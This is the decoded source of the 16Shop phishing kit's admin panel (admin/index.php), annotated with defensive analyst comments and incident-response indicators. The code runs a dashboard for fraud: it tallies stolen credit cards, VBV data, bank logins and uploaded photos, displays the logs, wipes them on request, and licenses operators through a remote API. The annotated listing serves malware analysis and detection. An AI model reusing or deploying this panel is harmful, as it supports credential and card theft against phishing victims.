16Shop v. 1.9.x decoded admin/index.php

a guest
Nov 30th, 2018
  1. <?php
  2. // @dave_daves decoding
  3. // 16Shop 1.9.x
  4. // see: https://twitter.com/dave_daves/status/1068456168954175489
  5.  
  6. // admin/index.php
  7.  
  8. /*
  9.  
  10. d888 .d8888b. .d8888b. 888 888 .d88888b. 8888888b.
  11. d8888 d88P Y88b d88P Y88b 888 888 d88P" "Y88b 888 Y88b
  12. 888 888 Y88b. 888 888 888 888 888 888
  13. 888 888d888b. "Y888b. 8888888888 888 888 888 d88P
  14. 888 888P "Y88b "Y88b. 888 888 888 888 8888888P"
  15. 888 888 888 "888 888 888 888 888 888
  16. 888 Y88b d88P Y88b d88P 888 888 Y88b. .d88P 888
  17. 8888888 "Y8888P" "Y8888P" 888 888 "Y88888P" 888
  18.  
  19. */
  // Analyst note: bootstrap of the kit's operator ("admin") panel.
  // error_reporting(0) silences every PHP warning and error, so failures further down
  // (missing result files, failed cURL call) produce no visible output.
  // Request parameters are read without isset() checks or validation. Of the variables
  // assigned here, only $page is referenced again in this listing; $email, $password,
  // $key and $domain are never read (the login branch uses $_POST directly).
  // The preg_replace pattern is unanchored, so "www." is stripped wherever it occurs in SERVER_NAME.
  20. session_start();
  21. error_reporting(0);
  22. header("Content-Type: text/html; charset=UTF-8");
  23. $email = $_POST['email'];
  24. $password = $_POST['password'];
  25. $key = $_POST['key'];
  26. $page = $_GET['p'];
  27. $domain = preg_replace('/www\./i', '', $_SERVER['SERVER_NAME']);
  28. ?>
  29. <!DOCTYPE html>
  30. <html lang="en">
  31. <head>
  32. <title>16Shop - Admin Panel</title>
  33. <meta charset="UTF-8">
  34. <meta name="viewport" content="width=device-width, initial-scale=1">
  35. <!--===============================================================================================-->
  36. <link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
  37. <!--===============================================================================================-->
  38. <link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
  39. <!--===============================================================================================-->
  40. <link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
  41. <!--===============================================================================================-->
  42. <link rel="stylesheet" type="text/css" href="fonts/Linearicons-Free-v1.0.0/icon-font.min.css">
  43. <!--===============================================================================================-->
  44. <link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
  45. <!--===============================================================================================-->
  46. <link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
  47. <!--===============================================================================================-->
  48. <link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
  49. <!--===============================================================================================-->
  50. <link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
  51. <!--===============================================================================================-->
  52. <link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
  53. <!--===============================================================================================-->
  54. <link rel="stylesheet" type="text/css" href="css/util.css">
  55. <link rel="stylesheet" type="text/css" href="css/main.css">
  56. <!--===============================================================================================-->
  57. </head>
  58. <body>
  59. <?php if($page == "") {
  // Analyst note: default view (no ?p= value) - the operator login form and its POST handler.
  // Credentials are not verified locally. login() forwards them to a remote endpoint and the
  // response text alone decides the outcome: "valid" opens a session, "lock" redirects to
  // ?p=lock, anything else (including a failed request) redirects to ?p=gagal
  // ("gagal" is Indonesian for "failed").
  // All redirects are done with inline <script> because the HTML head has already been sent.
  60. if(isset($_SESSION['email_admin'])) {
  61. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  62. exit();
  63. }
  64. if(isset($_POST['email'])) {
  // Argument order is key, email, password. The result is compared with loose ==.
  65. $login = login($_POST['key'],$_POST['email'], $_POST['password']);
  66. if($login == "valid") {
  // The presence of $_SESSION['email_admin'] is the only thing the other branches check.
  // The submitted password is also kept in the session in plaintext; nothing in this
  // listing reads it back.
  67. $_SESSION['email_admin'] = $_POST['email'];
  68. $_SESSION['password'] = $_POST['password'];
  69. }else if($login == "lock") {
  70. echo "<script type='text/javascript'>window.top.location='?p=lock';</script>";
  71. exit();
  72. }else{
  73. echo "<script type='text/javascript'>window.top.location='?p=gagal';</script>";
  74. exit();
  75. }
  76. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  77.  
  78. }
  79.  
  // Static login form markup (key, email, password). The "remember-me" checkbox is not
  // read anywhere in this listing.
  80. echo ' <div class="limiter">
  81. <div class="container-login100">
  82. <div class="wrap-login100">
  83.  
  84. <div class="login100-form-title" style="background-image: url(bg.png);">
  85. <br><br><br><br>
  86.  
  87. </div>
  88.  
  89. <form action="index.php" method="POST" class="login100-form validate-form">
  90.  
  91. <div class="wrap-input100 validate-input m-b-26" data-validate="Public key is required">
  92. <span class="label-input100">Key</span>
  93. <input class="input100" type="text" name="key" placeholder="Enter public key">
  94. <span class="focus-input100"></span>
  95. </div>
  96. <div class="wrap-input100 validate-input m-b-26" data-validate="Email is required">
  97. <span class="label-input100">Email</span>
  98. <input class="input100" type="email" name="email" placeholder="Enter email">
  99. <span class="focus-input100"></span>
  100. </div>
  101.  
  102. <div class="wrap-input100 validate-input m-b-18" data-validate = "Password is required">
  103. <span class="label-input100">Password</span>
  104. <input class="input100" type="password" name="password" placeholder="Enter password">
  105. <span class="focus-input100"></span>
  106. </div>
  107.  
  108. <div class="flex-sb-m w-full p-b-30">
  109. <div class="contact100-form-checkbox">
  110. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  111. <label class="label-checkbox100" for="ckb1">
  112. Remember me
  113. </label>
  114. </div>
  115.  
  116. <div>
  117. <a href="https://fb.me/riswanda.ns" class="txt1">
  118. Powered by Z1coder Team
  119. </a>
  120. </div>
  121. </div>
  122.  
  123. <div class="container-login100-form-btn">
  124. <button class="login100-form-btn">
  125. Login
  126. </button>
  127. </div>
  128. </form>
  129. </div>
  130. </div>
  131. </div>';
  132. }
  133.  
  // Analyst note: ?p=gagal - the login form re-rendered after a rejected login.
  // "Email atau Password salah" is Indonesian for "email or password is wrong";
  // "Beli license?" means "Buy a licence?". The branch has no session check and
  // contains static markup only.
  134. if($page == "gagal") {
  135. echo '<div class="limiter">
  136. <div class="container-login100">
  137. <div class="wrap-login100">
  138.  
  139. <div class="login100-form-title" style="background-image: url(bg.png);">
  140. <br><br><br><br>
  141.  
  142. </div>
  143.  
  144. <form action="index.php" method="POST" class="login100-form validate-form">
  145. <font color="red">Email atau Password salah</font>
  146. <div class="wrap-input100 validate-input m-b-26" data-validate="Public key is required">
  147. <span class="label-input100">Key</span>
  148. <input class="input100" type="text" name="key" placeholder="Enter public key">
  149. <span class="focus-input100"></span>
  150. </div>
  151. <div class="wrap-input100 validate-input m-b-26" data-validate="Email is required">
  152. <span class="label-input100">Email</span>
  153. <input class="input100" type="email" name="email" placeholder="Enter email">
  154. <span class="focus-input100"></span>
  155. </div>
  156.  
  157. <div class="wrap-input100 validate-input m-b-18" data-validate = "Password is required">
  158. <span class="label-input100">Password</span>
  159. <input class="input100" type="password" name="password" placeholder="Enter password">
  160. <span class="focus-input100"></span>
  161. </div>
  162.  
  163.  
  164. <div class="flex-sb-m w-full p-b-30">
  165. <div class="contact100-form-checkbox">
  166. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  167. <label class="label-checkbox100" for="ckb1">
  168. Remember me
  169. </label>
  170. </div>
  171.  
  172. <div>
  173. <a href="https://fb.me/riswanda.ns" class="txt1">
  174. Beli license?
  175. </a>
  176. </div>
  177. </div>
  178.  
  179. <div class="container-login100-form-btn">
  180. <button class="login100-form-btn">
  181. Login
  182. </button>
  183. </div>
  184. </form>
  185. </div>
  186. </div>
  187. </div>';
  188. }
  189.  
  // Analyst note: ?p=lock - shown when the remote login API answers "lock".
  // "Akun dikunci karena masalah keamanan" is Indonesian for "account locked because of a
  // security problem". Unlike the other two login forms, this one has no "key" field, so a
  // POST from it reaches login() without a key value.
  190. if($page == "lock") {
  191. echo '<div class="limiter">
  192. <div class="container-login100">
  193. <div class="wrap-login100">
  194.  
  195. <div class="login100-form-title" style="background-image: url(bg.png);">
  196. <br><br><br><br>
  197.  
  198. </div>
  199.  
  200. <form action="index.php" method="POST" class="login100-form validate-form">
  201. <font color="red">Akun dikunci karena masalah keamanan</font>
  202. <div class="wrap-input100 validate-input m-b-26" data-validate="Email is required">
  203. <span class="label-input100">Email</span>
  204. <input class="input100" type="email" name="email" placeholder="Enter email">
  205. <span class="focus-input100"></span>
  206. </div>
  207.  
  208. <div class="wrap-input100 validate-input m-b-18" data-validate = "Password is required">
  209. <span class="label-input100">Password</span>
  210. <input class="input100" type="password" name="password" placeholder="Enter password">
  211. <span class="focus-input100"></span>
  212. </div>
  213.  
  214.  
  215. <div class="flex-sb-m w-full p-b-30">
  216. <div class="contact100-form-checkbox">
  217. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  218. <label class="label-checkbox100" for="ckb1">
  219. Remember me
  220. </label>
  221. </div>
  222.  
  223. <div>
  224. <a href="https://fb.me/riswanda.ns" class="txt1">
  225. Beli license?
  226. </a>
  227. </div>
  228. </div>
  229.  
  230. <div class="container-login100-form-btn">
  231. <button class="login100-form-btn">
  232. Login
  233. </button>
  234. </div>
  235. </form>
  236. </div>
  237. </div>
  238. </div>';
  239. }
  240.  
  241.  
  242.  
  // Analyst note: ?p=history - dumps three flat files from ../result/ into read-only
  // <textarea> elements: log_visitor.txt ("Log Visitor"), total_bin.txt ("BIN List")
  // and total_bot.txt ("Bot Detected"). These paths are on-disk artefacts worth
  // collecting when a host serving this kit is examined.
  243. if($page == "history") {
  // Access control is the presence of the session key set by the login branch.
  244. if(!isset($_SESSION['email_admin'])) {
  245. die("<script type='text/javascript'>window.top.location='index.php';</script>");
  246. }
  // Each file is opened and read in full. Neither the fopen() result nor a zero
  // filesize() is checked, and error_reporting(0) hides any resulting warnings.
  247. $click = "../result/log_visitor.txt";
  248. $file = fopen($click, "r");
  249. $log_visitor = fread($file, filesize($click));
  250. $log_visitor = "\n".$log_visitor;
  251. fclose($file);
  252. $click = "../result/total_bot.txt";
  253. $file = fopen($click, "r");
  254. $log_bot = fread($file, filesize($click));
  255. $log_bot = "\n".$log_bot;
  256. fclose($file);
  257.  
  258. $click = "../result/total_bin.txt";
  259. $file = fopen($click, "r");
  260. $log_bin = fread($file, filesize($click));
  261. $log_bin = "\n".$log_bin;
  262. fclose($file);
  // The file bodies are concatenated into the markup as-is; no htmlspecialchars() is applied.
  263. echo '<div class="limiter">
  264. <div class="container-login100">
  265. <div class="wrap-login100">
  266. <div style="margin-top:-2px;background:#000;text-align:center;">
  267. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=home">Statistic</a>
  268. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=logout">Logout</a>
  269. </div>
  270. <div class="login100-form-title" style="background-image: url(bg.png);">
  271. <br><br><br><br>
  272.  
  273. </div>
  274.  
  275. <br><span style="margin-left:20px;"><b>Log Visitor</b></span><br>
  276. <textarea style="margin-left:20px;margin-top:5px;border-color:#000;border-style: inset;border-width:2px;" rows="15" cols="70%" disabled>
  277. '.$log_visitor.'
  278. </textarea>
  279. <br><br><span style="margin-left:20px;"><b>BIN List</b></span><br>
  280. <textarea style="margin-left:20px;margin-top:5px;border-color:#000;border-style: inset;border-width:2px;" rows="15" cols="70%" disabled>
  281. '.$log_bin.'
  282. </textarea>
  283. <br><br><span style="margin-left:20px;"><b>Bot Detected</b></span><br>
  284. <textarea style="margin-left:20px;margin-top:5px;border-color:#000;border-style: inset;border-width:2px;" rows="15" cols="70%" disabled>
  285. '.$log_bot.'
  286. </textarea>
  287. <br><br>
  288. <br>
  289. </div>
  290. </div>
  291. </div>';
  292. }
  293.  
  // Analyst note: ?p=home - operator statistics dashboard. Each counter is the number of
  // "\n" characters in one ../result/total_*.txt file (presumably one line per recorded
  // event - confirm against the scripts that write these files). The labels in the markup
  // below map the files to what the kit tracks: click, login, email access, credit card,
  // VBV, bank login, uploaded photo, detected bot.
  294. if($page == "home") {
  // Same session-presence gate as the other protected branches.
  295. if(!isset($_SESSION['email_admin'])) {
  296. die("<script type='text/javascript'>window.top.location='index.php';</script>");
  297. }
  // Pattern repeated for every counter: open, read the whole file, count newlines, close.
  // The if/else that follows each count has identical branches (a string cast), so the
  // test has no effect. The fopen() result and empty files are not checked.
  298. $click = "../result/total_click.txt";
  299. $file = fopen($click, "r");
  300. $total_click = fread($file, filesize($click));
  301. $total_click = substr_count($total_click, "\n");
  302. fclose($file);
  303. if($total_click == 0) {
  304. $total_click = "$total_click";
  305. }else{
  306. $total_click = "$total_click";
  307. }
  308.  
  309. $click = "../result/total_login.txt";
  310. $file = fopen($click, "r");
  311. $total_login = fread($file, filesize($click));
  312. $total_login = substr_count($total_login, "\n");
  313. fclose($file);
  314. if($total_login == 0) {
  315. $total_login = "$total_login";
  316. }else{
  317. $total_login = "$total_login";
  318. }
  319.  
  320. $click = "../result/total_cc.txt";
  321. $file = fopen($click, "r");
  322. $total_cc = fread($file, filesize($click));
  323. $total_cc = substr_count($total_cc, "\n");
  324. fclose($file);
  325. if($total_cc == 0) {
  326. $total_cc = "$total_cc";
  327. }else{
  328. $total_cc = "$total_cc";
  329. }
  330.  
  331. $click = "../result/total_vbv.txt";
  332. $file = fopen($click, "r");
  333. $total_vbv = fread($file, filesize($click));
  334. $total_vbv = substr_count($total_vbv, "\n");
  335. fclose($file);
  336. if($total_vbv == 0) {
  337. $total_vbv = "$total_vbv";
  338. }else{
  339. $total_vbv = "$total_vbv";
  340. }
  341.  
  342. $click = "../result/total_bank.txt";
  343. $file = fopen($click, "r");
  344. $total_bank = fread($file, filesize($click));
  345. $total_bank = substr_count($total_bank, "\n");
  346. fclose($file);
  347. if($total_bank == 0) {
  348. $total_bank = "$total_bank";
  349. }else{
  350. $total_bank = "$total_bank";
  351. }
  352.  
  353. $click = "../result/total_upload.txt";
  354. $file = fopen($click, "r");
  355. $total_photo = fread($file, filesize($click));
  356. $total_photo = substr_count($total_photo, "\n");
  357. fclose($file);
  358. if($total_photo == 0) {
  359. $total_photo = "$total_photo";
  360. }else{
  361. $total_photo = "$total_photo";
  362. }
  363.  
  364. $click = "../result/total_email.txt";
  365. $file = fopen($click, "r");
  366. $total_email = fread($file, filesize($click));
  367. $total_email = substr_count($total_email, "\n");
  368. fclose($file);
  369. if($total_email == 0) {
  370. $total_email = "$total_email";
  371. }else{
  372. $total_email = "$total_email";
  373. }
  374.  
  375. $click = "../result/total_bot.txt";
  376. $file = fopen($click, "r");
  377. $total_botnya = fread($file, filesize($click));
  378. $total_botnya = substr_count($total_botnya, "\n");
  379. fclose($file);
  380. if($total_botnya == 0) {
  381. $total_botnya = "$total_botnya";
  382. }else{
  383. $total_botnya = "$total_botnya";
  384. }
  385.  
  // The next three reads fill $log_visitor, $log_bot and $log_bin, but the markup echoed
  // by this branch does not use them (they are displayed by ?p=history instead).
  386. $click = "../result/log_visitor.txt";
  387. $file = fopen($click, "r");
  388. $log_visitor = fread($file, filesize($click));
  389. fclose($file);
  390.  
  391. $click = "../result/total_bot.txt";
  392. $file = fopen($click, "r");
  393. $log_bot = fread($file, filesize($click));
  394. fclose($file);
  395.  
  396. $click = "../result/total_bin.txt";
  397. $file = fopen($click, "r");
  398. $log_bin = fread($file, filesize($click));
  399. fclose($file);
  400. echo '<div class="limiter">
  401. <div class="container-login100">
  402. <div class="wrap-login100">
  403. <div style="margin-top:-2px;background:#000;text-align:center;">
  404. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=home">Statistic</a>
  405. <a style="background-color:#fff;color:#000;border-bottom-left-radius:2px;border-bottom-right-radius:2px;padding-right:20px;padding-left:20px;" href="?p=logout">Logout</a>
  406. </div>
  407. <div class="login100-form-title" style="background-image: url(bg.png);">
  408. <br><br><br><br>
  409.  
  410. </div>
  411.  
  412. <div class="login100-form">
  413. <div class="wrap-input100 m-b-26">
  414. <span class="label-input100">Click</span>
  415. <input class="input100" type="text" value="'.$total_click.'" disabled>
  416. <span class="focus-input100"></span>
  417. </div>
  418. <div class="wrap-input100 m-b-26">
  419. <span class="label-input100">Login</span>
  420. <input class="input100" type="text" value="'.$total_login.'" disabled>
  421. <span class="focus-input100"></span>
  422. </div>
  423. <div class="wrap-input100 m-b-26">
  424. <span class="label-input100">Email Access</span>
  425. <input class="input100" type="text" value="'.$total_email.'" disabled>
  426. <span class="focus-input100"></span>
  427. </div>
  428. <div class="wrap-input100 m-b-26">
  429. <span class="label-input100">Credit Card</span>
  430. <input class="input100" type="text" value="'.$total_cc.'" disabled>
  431. <span class="focus-input100"></span>
  432. </div>
  433. <div class="wrap-input100 m-b-26">
  434. <span class="label-input100">VBV</span>
  435. <input class="input100" type="text" value="'.$total_vbv.'" disabled>
  436. <span class="focus-input100"></span>
  437. </div>
  438. <div class="wrap-input100 m-b-26">
  439. <span class="label-input100">Bank Login</span>
  440. <input class="input100" type="text" value="'.$total_bank.'" disabled>
  441. <span class="focus-input100"></span>
  442. </div>
  443. <div class="wrap-input100 m-b-26">
  444. <span class="label-input100">Upload Photo</span>
  445. <input class="input100" type="text" value="'.$total_photo.'" disabled>
  446. <span class="focus-input100"></span>
  447. </div>
  448. <div class="wrap-input100 validate-input m-b-18">
  449. <span class="label-input100">Bot Detected</span>
  450. <input class="input100" type="text" value="'.$total_botnya.'" disabled>
  451. <span class="focus-input100"></span>
  452. </div>
  453.  
  454.  
  455. <div class="container-login100-form-btn">
  456. <a style="text-decoration:none;color:#fff;" href="index.php?p=resetdata">
  457. <span style="background:#000;" class="login100-form-btn">
  458. Reset Data
  459. </span></a>
  460. &nbsp;&nbsp;<a style="text-decoration:none;color:#fff;" href="index.php?p=history">
  461. <span style="background:#000;" class="login100-form-btn">
  462. Log History
  463. </span></a>
  464.  
  465.  
  466. </div>
  467. </div>
  468. </div>
  469. </div>
  470. </div>';
  471. }
  472.  
  // Analyst note: ?p=logout - destroys the PHP session and sends the browser back to the
  // login view. It is reachable by a plain GET and needs no existing session.
  473. if($page == "logout") {
  474. session_destroy();
  475. echo "<script type='text/javascript'>window.top.location='?';</script>";
  476. }
  477.  
  // Analyst note: ?p=resetdata - deletes every counter and log file under ../result/.
  // It is a state-changing action behind a plain GET, guarded only by the session-presence
  // check. For incident response this means the kit's own evidence can be wiped from the
  // panel, so ../result/ should be preserved early when such a host is examined.
  478. if($page == "resetdata") {
  479. if(!isset($_SESSION['email_admin'])) {
  480. die("<script type='text/javascript'>window.top.location='index.php';</script>");
  481. }
  // unlink() return values are ignored; a missing file produces only a suppressed warning.
  482. unlink("../result/total_login.txt");
  483. unlink("../result/total_email.txt");
  484. unlink("../result/total_cc.txt");
  485. unlink("../result/total_vbv.txt");
  486. unlink("../result/total_bot.txt");
  487. unlink("../result/total_bin.txt");
  488. unlink("../result/total_upload.txt");
  489. unlink("../result/total_click.txt");
  490. unlink("../result/total_bank.txt");
  491. unlink("../result/log_visitor.txt");
  492. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  493. }
  494.  
  // Analyst note: remote credential check. POSTs the operator's key, email and password,
  // together with the browser User-Agent and the address from user_ip(), to the hard-coded
  // endpoint below and returns the raw response body; the caller compares it with
  // "valid" and "lock".
  //  - The URL is plain http://, so the operator's credentials cross the network unencrypted.
  //  - The POST body is built by string interpolation without urlencode().
  //  - No timeout is set and the curl_exec() result is not checked (false on transport failure).
  // Detection: an outbound HTTP POST from a web server to this host and path is a network
  // indicator that this panel is in use.
  495. function login($key,$username,$password) {
  496. $get = curl_init();
  497. $agent = $_SERVER['HTTP_USER_AGENT'];
  498. $ipnya = user_ip();
  499. curl_setopt($get, CURLOPT_URL,"http://16shop.online/api/login_new.php");
  500. curl_setopt($get, CURLOPT_POST, 1);
  501. curl_setopt($get, CURLOPT_POSTFIELDS, "username=$username&password=$password&key=$key&ua=$agent&ip_user=$ipnya");
  502. curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
  503. $server_output = curl_exec ($get);
  504. curl_close($get);
  505. return $server_output;
  506. }
  507.  
  // Analyst note: picks the "client IP" in this order: the Client-IP request header, then
  // X-Forwarded-For, then REMOTE_ADDR. The first two are supplied by the requester, and
  // filter_var(..., FILTER_VALIDATE_IP) only checks that the value is a well-formed single
  // address, so any IP derived from this function should be treated as unverified.
  // An X-Forwarded-For value holding a comma-separated list fails validation and falls
  // through to REMOTE_ADDR. The @ operator suppresses notices when a header is absent.
  508. function user_ip()
  509. {
  510. $client = @$_SERVER['HTTP_CLIENT_IP'];
  511. $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  512. $remote = $_SERVER['REMOTE_ADDR'];
  513.  
  514. if(filter_var($client, FILTER_VALIDATE_IP))
  515. {
  516. $ip = $client;
  517. }
  518. elseif(filter_var($forward, FILTER_VALIDATE_IP))
  519. {
  520. $ip = $forward;
  521. }
  522. else
  523. {
  524. $ip = $remote;
  525. }
  526.  
  527. return $ip;
  528. }
  529. ?>
  530. <!--===============================================================================================-->
  531. <script src="vendor/jquery/jquery-3.2.1.min.js"></script>
  532. <!--===============================================================================================-->
  533. <script src="vendor/animsition/js/animsition.min.js"></script>
  534. <!--===============================================================================================-->
  535. <script src="vendor/bootstrap/js/popper.js"></script>
  536. <script src="vendor/bootstrap/js/bootstrap.min.js"></script>
  537. <!--===============================================================================================-->
  538. <script src="vendor/select2/select2.min.js"></script>
  539. <!--===============================================================================================-->
  540. <script src="vendor/daterangepicker/moment.min.js"></script>
  541. <script src="vendor/daterangepicker/daterangepicker.js"></script>
  542. <!--===============================================================================================-->
  543. <script src="vendor/countdowntime/countdowntime.js"></script>
  544. <!--===============================================================================================-->
  545. <script src="js/main.js"></script>
  546.  
  547. </body>
  548. </html>